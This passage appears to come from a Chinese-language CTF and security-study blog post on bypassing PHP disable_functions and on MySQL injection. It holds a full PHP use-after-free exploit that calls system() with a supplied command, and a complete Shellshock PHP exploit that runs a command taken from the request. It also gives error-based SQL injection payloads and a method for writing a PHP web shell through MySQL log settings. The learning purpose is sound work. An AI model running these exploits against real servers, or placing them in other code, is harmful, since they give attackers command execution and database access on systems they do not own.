class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; $n; $i++) &#123;</span><br><span class="line">            $str[$p + $i] = chr($v &amp; <span class="number">0xff</span>);</span><br><span class="line">            $v &gt;&gt;= <span class="number">8</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">leak</span>(<span class="params">$addr, $p = <span class="number">0</span>, $s = <span class="number">8</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">global</span> $abc, $helper;</span><br><span class="line">        write($abc, <span class="number">0x68</span>, $addr + $p - <span class="number">0x10</span>);</span><br><span class="line">        $leak = strlen($helper-&gt;a);</span><br><span class="line">        <span class="keyword">if</span>($s != <span class="number">8</span>) &#123; $leak %= <span class="number">2</span> &lt;&lt; ($s * <span class="number">8</span>) - <span class="number">1</span>; &#125;</span><br><span class="line">        <span class="keyword">return</span> $leak;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">parse_elf</span>(<span class="params">$base</span>) </span>&#123;</span><br><span class="line">        $e_type = leak($base, <span class="number">0x10</span>, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line">        $e_phoff = leak($base, <span class="number">0x20</span>);</span><br><span class="line">        $e_phentsize = leak($base, <span class="number">0x36</span>, <span class="number">2</span>);</span><br><span class="line">        $e_phnum = leak($base, <span class="number">0x38</span>, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; $e_phnum; $i++) &#123;</span><br><span class="line">            $header = $base + $e_phoff + $i * $e_phentsize;</span><br><span class="line">            $p_type  = leak($header, <span class="number">0</span>, <span class="number">4</span>);</span><br><span class="line">            $p_flags = leak($header, <span class="number">4</span>, <span class="number">4</span>);</span><br><span class="line">            $p_vaddr = leak($header, <span class="number">0x10</span>);</span><br><span class="line">            $p_memsz = leak($header, <span class="number">0x28</span>);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span>($p_type == <span class="number">1</span> &amp;&amp; $p_flags == <span class="number">6</span>) &#123; <span class="comment"># PT_LOAD, PF_Read_Write</span></span><br><span class="line">                <span class="comment"># handle pie</span></span><br><span class="line">                $data_addr = $e_type == <span class="number">2</span> ? $p_vaddr : $base + $p_vaddr;</span><br><span class="line">                $data_size = $p_memsz;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span>($p_type == <span class="number">1</span> &amp;&amp; $p_flags == <span class="number">5</span>) &#123; <span class="comment"># PT_LOAD, PF_Read_exec</span></span><br><span class="line">                $text_size = $p_memsz;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(!$data_addr || !$text_size || !$data_size)</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> [$data_addr, $text_size, $data_size];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">get_basic_funcs</span>(<span class="params">$base, $elf</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">list</span>($data_addr, $text_size, $data_size) = $elf;</span><br><span class="line">        <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; $data_size / <span class="number">8</span>; $i++) &#123;</span><br><span class="line">            $leak = leak($data_addr, $i * <span class="number">8</span>);</span><br><span class="line">            <span class="keyword">if</span>($leak - $base &gt; <span class="number">0</span> &amp;&amp; $leak - $base &lt; $data_addr - $base) &#123;</span><br><span class="line">                $deref = leak($leak);</span><br><span class="line">                <span class="comment"># &#x27;constant&#x27; constant check</span></span><br><span class="line">                <span class="keyword">if</span>($deref != <span class="number">0x746e6174736e6f63</span>)</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">            $leak = leak($data_addr, ($i + <span class="number">4</span>) * <span class="number">8</span>);</span><br><span class="line">            <span class="keyword">if</span>($leak - $base &gt; <span class="number">0</span> &amp;&amp; $leak - $base &lt; $data_addr - $base) &#123;</span><br><span class="line">                $deref = leak($leak);</span><br><span class="line">                <span class="comment"># &#x27;bin2hex&#x27; constant check</span></span><br><span class="line">                <span class="keyword">if</span>($deref != <span class="number">0x786568326e6962</span>)</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> $data_addr + $i * <span class="number">8</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">get_binary_base</span>(<span class="params">$binary_leak</span>) </span>&#123;</span><br><span class="line">        $base = <span class="number">0</span>;</span><br><span class="line">        $start = $binary_leak &amp; <span class="number">0xfffffffffffff000</span>;</span><br><span class="line">        <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; <span class="number">0x1000</span>; $i++) &#123;</span><br><span class="line">            $addr = $start - <span class="number">0x1000</span> * $i;</span><br><span class="line">            $leak = leak($addr, <span class="number">0</span>, <span class="number">7</span>);</span><br><span class="line">            <span class="keyword">if</span>($leak == <span class="number">0x10102464c457f</span>) &#123; <span class="comment"># ELF header</span></span><br><span class="line">                <span class="keyword">return</span> $addr;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">get_system</span>(<span class="params">$basic_funcs</span>) </span>&#123;</span><br><span class="line">        $addr = $basic_funcs;</span><br><span class="line">        <span class="keyword">do</span> &#123;</span><br><span class="line">            $f_entry = leak($addr);</span><br><span class="line">            $f_name = leak($f_entry, <span class="number">0</span>, <span class="number">6</span>);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span>($f_name == <span class="number">0x6d6574737973</span>) &#123; <span class="comment"># system</span></span><br><span class="line">                <span class="keyword">return</span> leak($addr + <span class="number">8</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            $addr += <span class="number">0x20</span>;</span><br><span class="line">        &#125; <span class="keyword">while</span>($f_entry != <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">ryat</span> </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> $ryat;</span><br><span class="line">        <span class="keyword">var</span> $chtg;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;chtg = <span class="keyword">$this</span>-&gt;ryat;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;ryat = <span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Helper</span> </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> $a, $b, $c, $d;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(stristr(PHP_OS, <span class="string">&#x27;WIN&#x27;</span>)) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;This PoC is for *nix systems only.&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $n_alloc = <span class="number">10</span>; <span class="comment"># increase this value if you get segfaults</span></span><br><span class="line"></span><br><span class="line">    $contiguous = [];</span><br><span class="line">    <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; $n_alloc; $i++)</span><br><span class="line">        $contiguous[] = str_repeat(<span class="string">&#x27;A&#x27;</span>, <span class="number">79</span>);</span><br><span class="line"></span><br><span class="line">    $poc = <span class="string">&#x27;a:4:&#123;i:0;i:1;i:1;a:1:&#123;i:0;O:4:&quot;ryat&quot;:2:&#123;s:4:&quot;ryat&quot;;R:3;s:4:&quot;chtg&quot;;i:2;&#125;&#125;i:1;i:3;i:2;R:5;&#125;&#x27;</span>;</span><br><span class="line">    $out = unserialize($poc);</span><br><span class="line">    gc_collect_cycles();</span><br><span class="line"></span><br><span class="line">    $v = [];</span><br><span class="line">    $v[<span class="number">0</span>] = ptr2str(<span class="number">0</span>, <span class="number">79</span>);</span><br><span class="line">    <span class="keyword">unset</span>($v);</span><br><span class="line">    $abc = $out[<span class="number">2</span>][<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line">    $helper = <span class="keyword">new</span> Helper;</span><br><span class="line">    $helper-&gt;b = <span class="function"><span class="keyword">function</span> (<span class="params">$x</span>) </span>&#123; &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(strlen($abc) == <span class="number">79</span> || strlen($abc) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;UAF failed&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># leaks</span></span><br><span class="line">    $closure_handlers = str2ptr($abc, <span class="number">0</span>);</span><br><span class="line">    $php_heap = str2ptr($abc, <span class="number">0x58</span>);</span><br><span class="line">    $abc_addr = $php_heap - <span class="number">0xc8</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># fake value</span></span><br><span class="line">    write($abc, <span class="number">0x60</span>, <span class="number">2</span>);</span><br><span class="line">    write($abc, <span class="number">0x70</span>, <span class="number">6</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment"># fake reference</span></span><br><span class="line">    write($abc, <span class="number">0x10</span>, $abc_addr + <span class="number">0x60</span>);</span><br><span class="line">    write($abc, <span class="number">0x18</span>, <span class="number">0xa</span>);</span><br><span class="line"></span><br><span class="line">    $closure_obj = str2ptr($abc, <span class="number">0x20</span>);</span><br><span class="line"></span><br><span class="line">    $binary_leak = leak($closure_handlers, <span class="number">8</span>);</span><br><span class="line">    <span class="keyword">if</span>(!($base = get_binary_base($binary_leak))) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Couldn&#x27;t determine binary base address&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!($elf = parse_elf($base))) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Couldn&#x27;t parse ELF header&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!($basic_funcs = get_basic_funcs($base, $elf))) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Couldn&#x27;t get basic_functions address&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!($zif_system = get_system($basic_funcs))) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Couldn&#x27;t get zif_system address&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># fake closure object</span></span><br><span class="line">    $fake_obj_offset = <span class="number">0xd0</span>;</span><br><span class="line">    <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; <span class="number">0x110</span>; $i += <span class="number">8</span>) &#123;</span><br><span class="line">        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># pwn</span></span><br><span class="line">    write($abc, <span class="number">0x20</span>, $abc_addr + $fake_obj_offset);</span><br><span class="line">    write($abc, <span class="number">0xd0</span> + <span class="number">0x38</span>, <span class="number">1</span>, <span class="number">4</span>); <span class="comment"># internal func type</span></span><br><span class="line">    write($abc, <span class="number">0xd0</span> + <span class="number">0x68</span>, $zif_system); <span class="comment"># internal func handler</span></span><br><span class="line"></span><br><span class="line">    ($helper-&gt;b)($cmd);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在可以连接的情况下，将poc上传到<code>/tmp/</code> 目录下，然后包含他。</p>
<p>比如 GKCTF2020 Checkin ，GYCTF2020 EasyThink也是 一样的bypass思路。先是<code>Ginkgo=eval($_POST[1]);</code> 然后AS连上后，在<code>/tmp/</code>目录上上传exp。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200526231323.png"></p>
<h4 id="LD-PRELOAD-劫持"><a href="#LD-PRELOAD-劫持" class="headerlink" title="LD_PRELOAD 劫持"></a>LD_PRELOAD 劫持</h4><blockquote>
<p>利用环境变量 LD_PRELOAD 劫持系统函数，让外部程序加载恶意 *.so</p>
</blockquote>
<h4 id="ImageMagick-vuln-bypass"><a href="#ImageMagick-vuln-bypass" class="headerlink" title="ImageMagick vuln bypass"></a>ImageMagick vuln bypass</h4><p>也就是<strong>利用存在漏洞的组件，扩展。</strong></p>
<h4 id="Mod-cgi"><a href="#Mod-cgi" class="headerlink" title="Mod_cgi"></a>Mod_cgi</h4><blockquote>
<p>修改 .htaccess，调整请求访问路由，绕过 php.ini 中的任何限制（让特定扩展名的文件直接和php-cgi通i信</p>
</blockquote>
<h4 id="Windows-系统组件-COM"><a href="#Windows-系统组件-COM" class="headerlink" title="Windows 系统组件 COM"></a>Windows 系统组件 COM</h4><p>在<code>c:/System32/</code> 下的一个<code>wshom.ocx</code> 文件。</p>
<h4 id="PHP-7-4-FFI-Bypass"><a href="#PHP-7-4-FFI-Bypass" class="headerlink" title="PHP 7.4 FFI Bypass"></a>PHP 7.4 FFI Bypass</h4><blockquote>
<p>FFI（Foreign Function Interface），即外部函数接口，允许从用户区调用C代码。简单地说，就是一项让你在PHP里能够调用C代码的技术。</p>
</blockquote>
<p>当PHP所有的命令执行函数被禁用后，通过PHP 7.4的新特性FFI可以实现用PHP代码调用C代码的方式，先声明C中的命令执行函数，然后再通过FFI变量调用该C函数即可Bypass disable_functions。</p>
<p>也就是说，通过PHP调用C的命令执行函数来绕过。</p>
<p>需要满足：</p>
<ol>
<li><code>opcache.preload</code> 启用. (指定将在服务器启动时编译和执行的PHP文件，文件中定义的所有函数和大多数类都将永久加载到 PHP 的函数和类表中，并在将来的任何请求的上下文中永久可用)。</li>
<li><code>FFI support = enable</code>。</li>
</ol>
<p>例题：[RCTF 2019]Nextphp</p>
<p><a href="https://hack-for.fun/posts/38da.html">https://hack-for.fun/posts/38da.html</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200527134039.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200526231206.png"></p>
<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/en/ffi.examples-basic.php">https://www.php.net/manual/en/ffi.examples-basic.php</a></p>
<p><a target="_blank" rel="noopener" href="https://3nd.xyz/2019/11/06/Memo/bypass-disable-functions/#0x04-PHP-7-4-FFI">https://3nd.xyz/2019/11/06/Memo/bypass-disable-functions/#0x04-PHP-7-4-FFI</a></p>
<h4 id="Bash-ShellShock"><a href="#Bash-ShellShock" class="headerlink" title="Bash ShellShock"></a>Bash ShellShock</h4><p>利用方法的前提是目标 OS 存在 Bash破壳（CVE-2014-6271）漏洞，该漏洞的具体介绍可参考: <a target="_blank" rel="noopener" href="https://www.freebuf.com/news/48331.html">破壳漏洞（CVE-2014-6271）综合分析：“破壳”漏洞系列分析之一</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo/images/20200527135528.png"></p>
<p><strong>Bash 破壳漏洞成因</strong>：目前的 Bash 使用的环境变量是通过函数名称来调用的，导致漏洞出问题是以 <code>()&#123;</code> 开头定义的环境变量在命令 ENV 中解析成函数后，Bash 执行并未退出，而是继续解析并执行 shell 命令。而其核心的原因在于在输入的过滤中没有严格限制边界，也没有做出合法化的参数判断。</p>
<p>好像AntSword 虚拟终端已经将这个漏洞作为默认使用了。</p>
<p>EXP：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">?php </span><br><span class="line"><span class="comment"># Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) </span></span><br><span class="line"><span class="comment"># Google Dork: none </span></span><br><span class="line"><span class="comment"># Date: 10/31/2014 </span></span><br><span class="line"><span class="comment"># Exploit Author: Ryan King (Starfall) </span></span><br><span class="line"><span class="comment"># Vendor Homepage: http://php.net </span></span><br><span class="line"><span class="comment"># Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror </span></span><br><span class="line"><span class="comment"># Version: 5.* (tested on 5.6.2) </span></span><br><span class="line"><span class="comment"># Tested on: Debian 7 and CentOS 5 and 6 </span></span><br><span class="line"><span class="comment"># CVE: CVE-2014-6271 </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">shellshock</span>(<span class="params">$cmd</span>) </span>&#123; <span class="comment">// Execute a command via CVE-2014-6271 @mail.c:283 </span></span><br><span class="line">   $tmp = tempnam(<span class="string">&quot;.&quot;</span>,<span class="string">&quot;data&quot;</span>); </span><br><span class="line">   putenv(<span class="string">&quot;PHP_LOL=() &#123; x; &#125;; $cmd &gt;$tmp 2&gt;&amp;1&quot;</span>); </span><br><span class="line">   <span class="comment">// In Safe Mode, the user may only alter environment variableswhose names </span></span><br><span class="line">   <span class="comment">// begin with the prefixes supplied by this directive. </span></span><br><span class="line">   <span class="comment">// By default, users will only be able to set environment variablesthat </span></span><br><span class="line">   <span class="comment">// begin with PHP_ (e.g. PHP_FOO=BAR). <span class="doctag">Note:</span> if this directive isempty, </span></span><br><span class="line">   <span class="comment">// PHP will let the user modify ANY environment variable! </span></span><br><span class="line">   mail(<span class="string">&quot;a@127.0.0.1&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="string">&quot;-bv&quot;</span>); <span class="comment">// -bv so we don&#x27;t actuallysend any mail </span></span><br><span class="line">   $output = @file_get_contents($tmp); </span><br><span class="line">   @unlink($tmp); </span><br><span class="line">   <span class="keyword">if</span>($output != <span class="string">&quot;&quot;</span>) <span class="keyword">return</span> $output; </span><br><span class="line">   <span class="keyword">else</span> <span class="keyword">return</span> <span class="string">&quot;No output, or not vuln.&quot;</span>; </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">echo</span> shellshock($_REQUEST[<span class="string">&quot;cmd&quot;</span>]); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="寻找漏网之鱼"><a href="#寻找漏网之鱼" class="headerlink" title="寻找漏网之鱼"></a>寻找漏网之鱼</h4><p>…自行领会。</p>
<hr>
<p><a target="_blank" rel="noopener" href="https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/paper/readme.old.md">https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/paper/readme.old.md</a></p>
<p><a target="_blank" rel="noopener" href="https://www.tr0y.wang/2018/04/18/PHPDisalbedfunc/index.html">https://www.tr0y.wang/2018/04/18/PHPDisalbedfunc/index.html</a></p>
<p><a target="_blank" rel="noopener" href="https://3nd.xyz/2019/11/06/Memo/bypass-disable-functions/">https://3nd.xyz/2019/11/06/Memo/bypass-disable-functions/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.mi1k7ea.com/2019/06/02/%E6%B5%85%E8%B0%88%E5%87%A0%E7%A7%8DBypass-disable-functions%E7%9A%84%E6%96%B9%E6%B3%95/">https://www.mi1k7ea.com/2019/06/02/%E6%B5%85%E8%B0%88%E5%87%A0%E7%A7%8DBypass-disable-functions%E7%9A%84%E6%96%B9%E6%B3%95/</a></p>
<h2 id="XXE-PHP-7-0-30"><a href="#XXE-PHP-7-0-30" class="headerlink" title="XXE - PHP 7.0.30"></a>XXE - PHP 7.0.30</h2><ul>
<li>Php 7.0.30</li>
<li>Libxml 2.8.0</li>
</ul>
<p><strong>libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞逐渐消亡。</strong></p>
<ul>
<li>SimpleXMLElement</li>
<li>loadXML</li>
<li>simplexml_load_string</li>
</ul>
<h2 id="unserialize-serialize"><a href="#unserialize-serialize" class="headerlink" title="unserialize/serialize"></a>unserialize/serialize</h2><ul>
<li><p>php 7.1.x～7.3.x（具体不知，php7.x 好像都可以，遇到时，试一下就可以。</p>
<p>对属性类型不敏感，可直接将属性改为public，减轻编写payload的负担。</p>
</li>
<li><p>php &lt; 5.6.25 &amp;&amp; php &lt; 7.0.10</p>
</li>
</ul>
<p><code>__wakeup</code> 可绕过。绕过方法：当对象属性个数大于真实属性个数时。</p>
<h2 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h2><p>不同版本的mysql 主要在”高级“ 注入情况下，</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7169#toc-3">https://xz.aliyun.com/t/7169#toc-3</a> 。 膜一波Yunen师傅。</p>
<h3 id="Mysql-lt-5-0-面试常问"><a href="#Mysql-lt-5-0-面试常问" class="headerlink" title="Mysql &lt; 5.0(面试常问)"></a>Mysql &lt; 5.0(面试常问)</h3><p>由于mysql的低版本缺乏系统库<strong>information_schema</strong>，故通常情况下，我们无法直接查询表名，字段(列)名等信息，这时候只能靠<strong>猜</strong>来解决。</p>
<p>直接猜表名与列名是什么，甚至是库名，再使用联合查询取数据。</p>
<p>若知道仅表名而不知道列(字段)名：</p>
<p>可通过以下payload：</p>
<ul>
<li>若多字段：select <code>x</code> from(select 1,2,3,4,xxx from table_name union select * from table_name)a</li>
<li>若单字段：select *,1,2,xxx from table_name</li>
</ul>
<h3 id="Mysql-gt-5-0（面试常问"><a href="#Mysql-gt-5-0（面试常问" class="headerlink" title="Mysql &gt;= 5.0（面试常问"></a>Mysql &gt;= 5.0（面试常问</h3><p>首先去一个名为<strong>information_schema</strong>的数据库里的<strong>shemata</strong>数据表查询<strong>全部数据库名</strong>。</p>
<p>若不需要跨数据库的话，可直接跳过此步骤，直接查询相应的数据库下的全部数据表名。</p>
<p>在information_schema的一个名为<strong>tables</strong>的数据表中存着全部的<strong>数据表信息</strong>。</p>
<p>其中，<strong>table_name 字段保存其名称</strong>，<strong>table_schema保存其对应的数据库名</strong>。</p>
<p>接着通过其表名，查询该表的所有字段名，有时也称列名。</p>
<p>通过information_schema库下的<strong>columns</strong>表可查询对应的数据库/数据库表含有的字段名。</p>
<blockquote>
<p>5.0以下没有information_schema这个系统表，无法列表名等，只能暴力跑表<br>名；5.0以下是多用户单操作，5.0以上是多用户多操做。</p>
</blockquote>
<h3 id="exp-pow-报错注入"><a href="#exp-pow-报错注入" class="headerlink" title="exp()/pow() 报错注入"></a>exp()/pow() 报错注入</h3><p>Mysql 5.5.5~5.5.49</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">MySQL [(none)]&gt; select exp(3);</span><br><span class="line">+--------------------+</span><br><span class="line">| exp(3)             |</span><br><span class="line">+--------------------+</span><br><span class="line">| 20.085536923187668 |</span><br><span class="line">+--------------------+</span><br><span class="line">1 row in set (0.04 sec)</span><br><span class="line"></span><br><span class="line">MySQL [(none)]&gt; select exp(999);</span><br><span class="line">ERROR 1690 (22003): DOUBLE value is out of range in &#39;exp(999)&#39;</span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">MySQL [(none)]&gt; select pow(9,99);</span><br><span class="line">+-----------------------+</span><br><span class="line">| pow(9,99)             |</span><br><span class="line">+-----------------------+</span><br><span class="line">| 2.9512665430652752e94 |</span><br><span class="line">+-----------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">MySQL [(none)]&gt; select pow(9,999);</span><br><span class="line">ERROR 1690 (22003): DOUBLE value is out of range in &#39;pow(9,999)&#39;</span><br></pre></td></tr></table></figure>

<h3 id="updatexml-报错注入"><a href="#updatexml-报错注入" class="headerlink" title="updatexml() 报错注入"></a>updatexml() 报错注入</h3><p>Mysql 5.1.5+</p>
<p>与exp()不同，updatexml是由于参数的格式不正确而产生的错误，同样也会返回参数的信息。</p>
<p>payload: <code>updatexml(1,concat(0x7e,(select user()),0x7e),1)</code></p>
<p>前后添加~使其不符合xpath格式从而报错。</p>
<h3 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue()"></a>extractvalue()</h3><p>函数语法：<code>EXTRACTVALUE (XML_document, XPath_string);</code></p>
<p>适用版本：5.1.5+</p>
<p>利用原理与updatexml函数相同</p>
<p>payload: <code>and (extractvalue(1,concat(0x7e,(select user()),0x7e)))</code></p>
<h3 id="文件读写"><a href="#文件读写" class="headerlink" title="文件读写"></a>文件读写</h3><ul>
<li><code>file_priv</code> 用户的文件读写权限。</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select file_priv from mysql.user where user&#x3D;$USER host&#x3D;$HOST;</span><br></pre></td></tr></table></figure>

<ul>
<li><code>secure-file-priv</code>系统变量，对文件读/写功能进行限制<ul>
<li>无内容，表示无限制。</li>
<li>为NULL，表示禁止文件读/写。</li>
</ul>
</li>
<li>为目录名，表示仅允许对特定目录的文件进行读/写。</li>
</ul>
<p>mysql 5.5.53 本身及以后的版本默认值为NULL，之前的版本无内容。</p>
<p>查看当前的<code>secure-file-priv</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> @@secure_file_priv;</span><br><span class="line"><span class="keyword">select</span> @@global.secure_file_priv;</span><br><span class="line"><span class="keyword">show</span> <span class="keyword">variables</span> <span class="keyword">like</span> <span class="string">&quot;secure_file_priv&quot;</span>;</span><br></pre></td></tr></table></figure>



<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">MySQL [(none)]&gt; select @@secure_file_priv;</span><br><span class="line">+<span class="comment">--------------------+</span></span><br><span class="line">| @@secure_file_priv |</span><br><span class="line">+<span class="comment">--------------------+</span></span><br><span class="line">| NULL               |</span><br><span class="line">+<span class="comment">--------------------+</span></span><br><span class="line">1 row in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br><span class="line"></span><br><span class="line">MySQL [(<span class="keyword">none</span>)]&gt; <span class="keyword">select</span> <span class="keyword">version</span>();</span><br><span class="line">+<span class="comment">------------+</span></span><br><span class="line">| version()  |</span><br><span class="line">+<span class="comment">------------+</span></span><br><span class="line">| 5.6.46-log |</span><br><span class="line">+<span class="comment">------------+</span></span><br><span class="line">1 row in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure>



<p>由于mysql在5.5.53版本之后，<code>secure-file-priv</code>的值默认为<code>NULL</code>，这使得正常读取文件的操作基本不可行。我们这里可以利用mysql生成日志文件的方法来绕过。</p>
<p>如果上面不行，就可以用日志进行攻击。（面试经常会问道。</p>
<p>mysql日志文件的一些相关设置可以直接通过命令来进行：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//请求日志</span><br><span class="line">mysql&gt; set global general_log_file = &#x27;/var/www/html/1.php&#x27;;</span><br><span class="line">mysql&gt; set global general_log = on;</span><br><span class="line">//慢查询日志</span><br><span class="line">mysql&gt; set global slow_query_log_file=&#x27;/var/www/html/2.php&#x27;</span><br><span class="line">mysql&gt; set global slow_query_log=1;</span><br><span class="line">//还有其他很多日志都可以进行利用</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>之后我们在让数据库执行满足记录条件的恶意语句即可。</p>
<p>限制：</p>
<ul>
<li>权限够，可以进行日志的设置操作</li>
<li>知道目标目录的绝对路径</li>
</ul>
